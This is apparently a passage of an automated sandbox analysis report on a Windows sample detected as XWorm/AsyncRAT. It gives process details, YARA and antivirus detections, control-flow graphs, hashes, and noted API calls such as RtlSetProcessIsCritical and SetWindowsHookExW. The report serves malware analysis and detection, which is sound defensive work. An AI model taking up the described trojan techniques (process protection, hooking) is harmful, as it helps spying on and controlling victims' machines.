                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 79%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:13:30:04
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\localsys64.exe"
                                                  Imagebase:0x660000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:13:30:12
                                                  Start date:22/10/2024
                                                  Path:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\localsys64.exe"
                                                  Imagebase:0xbe0000
                                                  File size:302'592 bytes
                                                  MD5 hash:55107DA03A7EE49D56320D0B43945691
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:20.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:6
                                                    Total number of Limit Nodes:0
                                                    execution_graph 4149 7ffd9b88291d 4150 7ffd9b88294f RtlSetProcessIsCritical 4149->4150 4152 7ffd9b882a02 4150->4152 4153 7ffd9b882e48 4155 7ffd9b882e51 SetWindowsHookExW 4153->4155 4156 7ffd9b882f21 4155->4156

                                                    Executed Functions

                                                    Function 00007FFD9B8812C9 Relevance: 2.1, Strings: 1, Instructions: 810COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffd9b8812c9-7ffd9b881300 2 7ffd9b881b28-7ffd9b881b6f 0->2 3 7ffd9b881306-7ffd9b881435 call 7ffd9b8804d8 * 8 call 7ffd9b8805e8 0->3 44 7ffd9b88143e-7ffd9b8814af call 7ffd9b880490 call 7ffd9b880358 call 7ffd9b880368 3->44 45 7ffd9b881437 3->45 57 7ffd9b8814c2-7ffd9b8814d2 44->57 58 7ffd9b8814b1-7ffd9b8814bb 44->58 45->44 61 7ffd9b8814d4-7ffd9b8814f3 call 7ffd9b880358 57->61 62 7ffd9b8814fa-7ffd9b88151a 57->62 58->57 61->62 68 7ffd9b88151c-7ffd9b881526 call 7ffd9b880378 62->68 69 7ffd9b88152b-7ffd9b88158f call 7ffd9b880728 62->69 68->69 79 7ffd9b88162f-7ffd9b8816bd 69->79 80 7ffd9b881595-7ffd9b88162a 69->80 99 7ffd9b8816c4-7ffd9b881802 call 7ffd9b880860 call 7ffd9b880838 call 7ffd9b880388 call 7ffd9b880398 79->99 80->99 123 7ffd9b881804-7ffd9b88181b 99->123 124 7ffd9b881850-7ffd9b881883 99->124 129 7ffd9b88181d-7ffd9b881826 123->129 130 7ffd9b881829-7ffd9b881837 123->130 136 7ffd9b8818a8-7ffd9b8818d8 124->136 137 7ffd9b881885-7ffd9b8818a6 124->137 129->130 130->124 132 7ffd9b881839-7ffd9b881846 130->132 132->124 135 7ffd9b881848-7ffd9b88184e 132->135 135->124 140 7ffd9b8818e0-7ffd9b881917 136->140 137->140 145 7ffd9b88193c-7ffd9b88196c 140->145 146 7ffd9b881919-7ffd9b88193a 140->146 148 7ffd9b881974-7ffd9b881a56 call 7ffd9b8803a8 call 7ffd9b880588 call 7ffd9b880728 145->148 146->148 166 7ffd9b881a5d-7ffd9b881ab9 148->166 167 7ffd9b881a58 call 7ffd9b880808 148->167 175 7ffd9b881abb-7ffd9b881ac4 166->175 176 7ffd9b881ac5-7ffd9b881b08 166->176 167->166 175->176 182 7ffd9b881b0f-7ffd9b881b27 176->182
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CAO_^
                                                    • API String ID: 0-3111533842
                                                    • Opcode ID: 16132cf12cad85a9ee4bbc7fa73462ba3ea0aaaabf1c8b34c5b2363a124d7cc8
                                                    • Instruction ID: ac9bee7d130f9e88548e6cd424ace4b73ff2e2ed0d83cc444c1529464f866601
                                                    • Opcode Fuzzy Hash: 16132cf12cad85a9ee4bbc7fa73462ba3ea0aaaabf1c8b34c5b2363a124d7cc8
                                                    • Instruction Fuzzy Hash: CB42D761B29E094FE798FB789865AB977D2FF9C740F5405B9E01EC32D6DE38A8018341
                                                    Function 00007FFD9B889066 Relevance: .5, Instructions: 472COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 321 7ffd9b889066-7ffd9b889073 322 7ffd9b889075-7ffd9b88907d 321->322 323 7ffd9b88907e-7ffd9b889147 321->323 322->323 327 7ffd9b889149-7ffd9b889152 323->327 328 7ffd9b8891b3 323->328 327->328 329 7ffd9b889154-7ffd9b889160 327->329 330 7ffd9b8891b5-7ffd9b8891da 328->330 331 7ffd9b889199-7ffd9b8891b1 329->331 332 7ffd9b889162-7ffd9b889174 329->332 337 7ffd9b889246 330->337 338 7ffd9b8891dc-7ffd9b8891e5 330->338 331->330 333 7ffd9b889176 332->333 334 7ffd9b889178-7ffd9b88918b 332->334 333->334 334->334 336 7ffd9b88918d-7ffd9b889195 334->336 336->331 339 7ffd9b889248-7ffd9b8892f0 337->339 338->337 340 7ffd9b8891e7-7ffd9b8891f3 338->340 351 7ffd9b88935e 339->351 352 7ffd9b8892f2-7ffd9b8892fc 339->352 341 7ffd9b8891f5-7ffd9b889207 340->341 342 7ffd9b88922c-7ffd9b889244 340->342 344 7ffd9b889209 341->344 345 7ffd9b88920b-7ffd9b88921e 341->345 342->339 344->345 345->345 346 7ffd9b889220-7ffd9b889228 345->346 346->342 353 7ffd9b889360-7ffd9b889389 351->353 352->351 354 7ffd9b8892fe-7ffd9b88930b 352->354 361 7ffd9b88938b-7ffd9b889396 353->361 362 7ffd9b8893f3 353->362 355 7ffd9b88930d-7ffd9b88931f 354->355 356 7ffd9b889344-7ffd9b88935c 354->356 358 7ffd9b889321 355->358 359 7ffd9b889323-7ffd9b889336 355->359 356->353 358->359 359->359 360 7ffd9b889338-7ffd9b889340 359->360 360->356 361->362 363 7ffd9b889398-7ffd9b8893a6 361->363 364 7ffd9b8893f5-7ffd9b889486 362->364 365 7ffd9b8893a8-7ffd9b8893ba 363->365 366 7ffd9b8893df-7ffd9b8893f1 363->366 372 7ffd9b88948c-7ffd9b88949b 364->372 368 7ffd9b8893bc 365->368 369 7ffd9b8893be-7ffd9b8893d1 365->369 366->364 368->369 369->369 370 7ffd9b8893d3-7ffd9b8893db 369->370 370->366 373 7ffd9b88949d 372->373 374 7ffd9b8894a3-7ffd9b889508 call 7ffd9b889524 372->374 373->374 381 7ffd9b88950a 374->381 382 7ffd9b88950f-7ffd9b889523 374->382 381->382
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa925e7d4528c5250d71f243840e1cabd8264d1984d5484fef3df8c8d5bb6663
                                                    • Instruction ID: 071d727804cb6d1d2c539a3f7ad5da4b3c8c0236635396c6705c71859d39456f
                                                    • Opcode Fuzzy Hash: aa925e7d4528c5250d71f243840e1cabd8264d1984d5484fef3df8c8d5bb6663
                                                    • Instruction Fuzzy Hash: 86F1C630A0DA4E8FEBA8DF68C8597E937D1FF58310F04466EE85DC7295DB3499418B81
                                                    Function 00007FFD9B889E12 Relevance: .5, Instructions: 458COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 383 7ffd9b889e12-7ffd9b889e1f 384 7ffd9b889e2a-7ffd9b889ef7 383->384 385 7ffd9b889e21-7ffd9b889e29 383->385 389 7ffd9b889ef9-7ffd9b889f02 384->389 390 7ffd9b889f63 384->390 385->384 389->390 391 7ffd9b889f04-7ffd9b889f10 389->391 392 7ffd9b889f65-7ffd9b889f8a 390->392 393 7ffd9b889f49-7ffd9b889f61 391->393 394 7ffd9b889f12-7ffd9b889f24 391->394 399 7ffd9b889ff6 392->399 400 7ffd9b889f8c-7ffd9b889f95 392->400 393->392 395 7ffd9b889f26 394->395 396 7ffd9b889f28-7ffd9b889f3b 394->396 395->396 396->396 398 7ffd9b889f3d-7ffd9b889f45 396->398 398->393 401 7ffd9b889ff8-7ffd9b88a01d 399->401 400->399 402 7ffd9b889f97-7ffd9b889fa3 400->402 409 7ffd9b88a08b 401->409 410 7ffd9b88a01f-7ffd9b88a029 401->410 403 7ffd9b889fa5-7ffd9b889fb7 402->403 404 7ffd9b889fdc-7ffd9b889ff4 402->404 405 7ffd9b889fb9 403->405 406 7ffd9b889fbb-7ffd9b889fce 403->406 404->401 405->406 406->406 408 7ffd9b889fd0-7ffd9b889fd8 406->408 408->404 411 7ffd9b88a08d-7ffd9b88a0bb 409->411 410->409 412 7ffd9b88a02b-7ffd9b88a038 410->412 418 7ffd9b88a12b 411->418 419 7ffd9b88a0bd-7ffd9b88a0c8 411->419 413 7ffd9b88a03a-7ffd9b88a04c 412->413 414 7ffd9b88a071-7ffd9b88a089 412->414 416 7ffd9b88a04e 413->416 417 7ffd9b88a050-7ffd9b88a063 413->417 414->411 416->417 417->417 420 7ffd9b88a065-7ffd9b88a06d 417->420 422 7ffd9b88a12d-7ffd9b88a205 418->422 419->418 421 7ffd9b88a0ca-7ffd9b88a0d8 419->421 420->414 423 7ffd9b88a0da-7ffd9b88a0ec 421->423 424 7ffd9b88a111-7ffd9b88a129 421->424 432 7ffd9b88a20b-7ffd9b88a21a 422->432 425 7ffd9b88a0ee 423->425 426 7ffd9b88a0f0-7ffd9b88a103 423->426 424->422 425->426 426->426 428 7ffd9b88a105-7ffd9b88a10d 426->428 428->424 433 7ffd9b88a21c 432->433 434 7ffd9b88a222-7ffd9b88a284 call 7ffd9b88a2a0 432->434 433->434 441 7ffd9b88a286 434->441 442 7ffd9b88a28b-7ffd9b88a29f 434->442 441->442
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8a017a554415cf83dae94b773e3d672e63b476a2dd16fe1b24a05052e1251b8
                                                    • Instruction ID: 286bdf885fc6a3f6d941b4415d4978e722e383021c070a54d85027fb3d4941d6
                                                    • Opcode Fuzzy Hash: b8a017a554415cf83dae94b773e3d672e63b476a2dd16fe1b24a05052e1251b8
                                                    • Instruction Fuzzy Hash: E6E1E530A08A4E8FEBA8DF68C8657E977D1FF58310F14426EE85DC7295DF74A9408B81
                                                    Function 00007FFD9B881C5D Relevance: .2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4e67607986bcce0e1b492110d50245038df18eaacc6df461795e9b2e9e67f4f
                                                    • Instruction ID: ada90ffdd799f86136ae040f646495dbcd9e29b7630a8bad7926347333d2ae57
                                                    • Opcode Fuzzy Hash: d4e67607986bcce0e1b492110d50245038df18eaacc6df461795e9b2e9e67f4f
                                                    • Instruction Fuzzy Hash: 1E511F20B0EAC94FD796AB7858746757FE1DF8B219B0904FBE099C71E7DD181806C342
                                                    Function 00007FFD9B88291D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 222 7ffd9b88291d-7ffd9b882a00 RtlSetProcessIsCritical 226 7ffd9b882a02 222->226 227 7ffd9b882a08-7ffd9b882a3d 222->227 226->227
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID: CriticalProcess
                                                    • String ID:
                                                    • API String ID: 2695349919-0
                                                    • Opcode ID: 727ad8bd4d8a29a359a3d946f226829e93728edece8b84b4a82e4867b578ff88
                                                    • Instruction ID: d6a259b99e8ee6cb255d94e0b948c40a8ce7f781757809090acb879250f3cd96
                                                    • Opcode Fuzzy Hash: 727ad8bd4d8a29a359a3d946f226829e93728edece8b84b4a82e4867b578ff88
                                                    • Instruction Fuzzy Hash: 1041033190C6488FC718DFA8D855AE9BBF0FF56310F04416EE09AC3592CB346846CB91
                                                    Function 00007FFD9B882E48 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 229 7ffd9b882e48-7ffd9b882e4f 230 7ffd9b882e51-7ffd9b882e59 229->230 231 7ffd9b882e5a-7ffd9b882ecd 229->231 230->231 235 7ffd9b882ed3-7ffd9b882ed8 231->235 236 7ffd9b882f59-7ffd9b882f5d 231->236 238 7ffd9b882edf-7ffd9b882ee0 235->238 237 7ffd9b882ee2-7ffd9b882f1f SetWindowsHookExW 236->237 239 7ffd9b882f21 237->239 240 7ffd9b882f27-7ffd9b882f58 237->240 238->237 239->240
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2940143031.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_fjijTlM2tu.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 6211d7d66d4acd312ce549c5946ab5dccedc00fd443aad0db363fc4d327df641
                                                    • Instruction ID: 2b2fc0fbb3975a423a0c11770759a37c425842d328f3bade983fc6a4d08941df
                                                    • Opcode Fuzzy Hash: 6211d7d66d4acd312ce549c5946ab5dccedc00fd443aad0db363fc4d327df641
                                                    • Instruction Fuzzy Hash: 3A41F530A1CA4D8FDB58DFAC98566F9BBE1EF59321F10427ED059C3292CA74A85287C1

                                                    Executed Functions

                                                    Function 00007FFD9B98660A Relevance: .5, Instructions: 460COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9033f5f540bf407507d3ec7254d5d9fad988253b38f85bdb1a96b36ba8ec8e88
                                                    • Instruction ID: 4afc3fb52fa0d7565e441faf849bf810f16cd6e053cc00dc1eb9a9a1c85ea936
                                                    • Opcode Fuzzy Hash: 9033f5f540bf407507d3ec7254d5d9fad988253b38f85bdb1a96b36ba8ec8e88
                                                    • Instruction Fuzzy Hash: 75D14632B1EECD1FEBA59BA858659B57BD1EF56310B1901FED44CCB0E3D928A901C341
                                                    Function 00007FFD9B8BA0D3 Relevance: .3, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00cb62bb894214071c926d7aa59baef22537a98716a89f5bddecf58a0369ede9
                                                    • Instruction ID: 34f6b17cd24c7dd777418083baec54366130942e0ebcdd492b5d59a11275a258
                                                    • Opcode Fuzzy Hash: 00cb62bb894214071c926d7aa59baef22537a98716a89f5bddecf58a0369ede9
                                                    • Instruction Fuzzy Hash: D2116D7290EBDC5FDB538B3888750947FB0EE6720070A01EBD489CB0B3D9295909CB92
                                                    Function 00007FFD9B8B9758 Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cc57c23ed756842f853d39118a3d5f3c72e6c606739cf085e0dc8c17022ba78
                                                    • Instruction ID: eac05ccadda4144ca96a278e5e3169c7613cf883ff97f989d5156432b886dc47
                                                    • Opcode Fuzzy Hash: 4cc57c23ed756842f853d39118a3d5f3c72e6c606739cf085e0dc8c17022ba78
                                                    • Instruction Fuzzy Hash: 8F31F971A1DF4C8FDB189F5C9C4A6B97BE0FBA9310F40412FE44993252DA20A916CBC6
                                                    Function 00007FFD9B79E384 Relevance: .1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1758583044.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b79d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4376d9db35a87a7dcce5cc6c98cb4db93b8152320496e5505e1e3a404c63c780
                                                    • Instruction ID: 1de89bdc59ed288c49dc27e64b258c771e1f1c675aff1f76d5f7ddb6fc7923e5
                                                    • Opcode Fuzzy Hash: 4376d9db35a87a7dcce5cc6c98cb4db93b8152320496e5505e1e3a404c63c780
                                                    • Instruction Fuzzy Hash: F641287150EBC84FE7568B28D8559523FF0EF52320B1606EFD088CB1B3D625B84AC792
                                                    Function 00007FFD9B8BA62C Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e0d29a1e792570e23c462de25b996ca070538e6642fcf4941d3905f81026e06
                                                    • Instruction ID: dec5e24f8106bce62edbed50d2f473902813c3d14a46455b270bf05987f4db0a
                                                    • Opcode Fuzzy Hash: 1e0d29a1e792570e23c462de25b996ca070538e6642fcf4941d3905f81026e06
                                                    • Instruction Fuzzy Hash: 5421E67190CB4C8FDB59DBAC984A7E97BE0EB96321F04416FD048C3162DA74941ACB92
                                                    Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                    • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                    • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                    Function 00007FFD9B98414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d2caa35d222456cfd67b3ca793c40176815732381cfdd0fd36cb9bf43165a647
                                                    • Instruction ID: d31de5377d604be5b8f8092cde5eaaf93ac71ffceaa995f17aa214d15e75816f
                                                    • Opcode Fuzzy Hash: d2caa35d222456cfd67b3ca793c40176815732381cfdd0fd36cb9bf43165a647
                                                    • Instruction Fuzzy Hash: 9FF0BE32B0E9098FD769EA5CE4519A873E0EF6532071600BAE06DC72B3CA35EC40C781
                                                    Function 00007FFD9B984400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8fe5e8a0a6a0b89328ebc719e124195cd47cfc86f335552158ddc68b85356b3
                                                    • Instruction ID: d1a1b23735728c0bd91b9495d19865977c75aef0a9e7d23a7fb9c666301786c0
                                                    • Opcode Fuzzy Hash: f8fe5e8a0a6a0b89328ebc719e124195cd47cfc86f335552158ddc68b85356b3
                                                    • Instruction Fuzzy Hash: C1F0BE32A0E9498FD768EA6CE0609A873E0FF05324B0600BAE05DCB1A3CA25AC40C740
                                                    Function 00007FFD9B9841D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759441334.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: f848ec0fbad17b8826867ba541709e28433eada1e34e052a78df0744753283af
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: F1E01A31B1C8089FDAB9DA4CE051AA973E1EFA832171241BBD14EC7671CA32ED518B80

                                                    Non-executed Functions

                                                    Function 00007FFD9B8B8995 Relevance: 5.2, Strings: 4, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: K_^$K_^$K_^$K_^
                                                    • API String ID: 0-4267328068
                                                    • Opcode ID: 33ea1a07d8b9edc26f8b120ee17ead8f7e59725d592b8fa2eb4681a8bf48e584
                                                    • Instruction ID: 10575d6b618ed5ccbb1581c067706f17f41ace77ee9e6864d90d93d753cdb9d5
                                                    • Opcode Fuzzy Hash: 33ea1a07d8b9edc26f8b120ee17ead8f7e59725d592b8fa2eb4681a8bf48e584
                                                    • Instruction Fuzzy Hash: 0941B2A3A0F6E65FE726476958790D57FA0EF2631470E12F7D0D48B0A3ED1825078792
                                                    Function 00007FFD9B8B8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1759023809.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: K_^4$K_^7$K_^F$K_^J
                                                    • API String ID: 0-377281160
                                                    • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                    • Instruction ID: c815e6c2b718b347b84d3f063be8ded7c21d719f69ad06d17291c854427b9ce5
                                                    • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                    • Instruction Fuzzy Hash: 3421D4B77085269ED70A7B7DBC589E93BA0DB9827834542F3D1A9CB093E91460878AD0

                                                    Executed Functions

                                                    Function 00007FFD9B88644D Relevance: .7, Instructions: 710COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56e228493864d70166653009e10562bde1790737d108d003a3d758c5d94aeada
                                                    • Instruction ID: 30eed2e9352e35f7cb861ecd484d62bc34104f159282dc6f19379841338f81f3
                                                    • Opcode Fuzzy Hash: 56e228493864d70166653009e10562bde1790737d108d003a3d758c5d94aeada
                                                    • Instruction Fuzzy Hash: F8D19170A08A4D8FDF99DF58C455AA9BBE1FF68300F15426AD41DD72A5CB34E881CB81
                                                    Function 00007FFD9B956605 Relevance: .4, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 867726b0227e38c54c00be2cd8bb1a397196b9521cc63f359c38bdf850db296f
                                                    • Instruction ID: 634fbbf62a9ff518d2be6b43e25ee9f58ceedc6ef753ebbaed3c07d832066bce
                                                    • Opcode Fuzzy Hash: 867726b0227e38c54c00be2cd8bb1a397196b9521cc63f359c38bdf850db296f
                                                    • Instruction Fuzzy Hash: B5D15731B2FA8E1FEBA59BE858645B57BA0EF52314B1901FED85CC70E3D918AD05C341
                                                    Function 00007FFD9B889D48 Relevance: .2, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53fe594553ca9121aed5ff05fac2ac81bbbf4a34e74981571fc0b5905519cdf9
                                                    • Instruction ID: dd6c8e981585598c32e6b1f20edd13bd056a65417394c35b5421c06a39a2f70e
                                                    • Opcode Fuzzy Hash: 53fe594553ca9121aed5ff05fac2ac81bbbf4a34e74981571fc0b5905519cdf9
                                                    • Instruction Fuzzy Hash: FAF0B434509A4D8FCB52DF2884191A47FF0FF29300B0501A7E449CB061D67499148B82
                                                    Function 00007FFD9B88A64C Relevance: .1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
